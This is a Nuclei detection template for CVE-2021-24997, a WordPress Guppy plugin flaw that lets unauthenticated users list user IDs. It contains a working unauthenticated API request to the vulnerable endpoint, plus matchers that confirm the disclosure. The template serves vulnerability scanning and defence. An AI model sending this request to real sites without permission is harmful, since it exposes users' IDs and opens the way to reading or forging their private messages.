nuclei-templates/cves/2021/CVE-2021-24997.yaml

38 lines
1.3 KiB
YAML

id: CVE-2021-24997
info:
name: Wordpress Guppy <=1.1 - User ID Disclosure
author: Evan Rubinstein
severity: medium
description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information to make API requests to either get messages sent between users, or send messages posing as one user to another.
reference:
- https://www.exploit-db.com/exploits/50540
- https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2021-24997
- https://wpscan.com/vulnerability/747e6c7e-a167-4d82-b6e6-9e8613f0e900
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2021-24997
cwe-id: CWE-862
tags: wordpress,guppy,api,cve2021,cve,wp-plugin
requests:
- method:
path:
- "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '"guppyUsers":'
- '"userId":'
- '"type":'
condition: and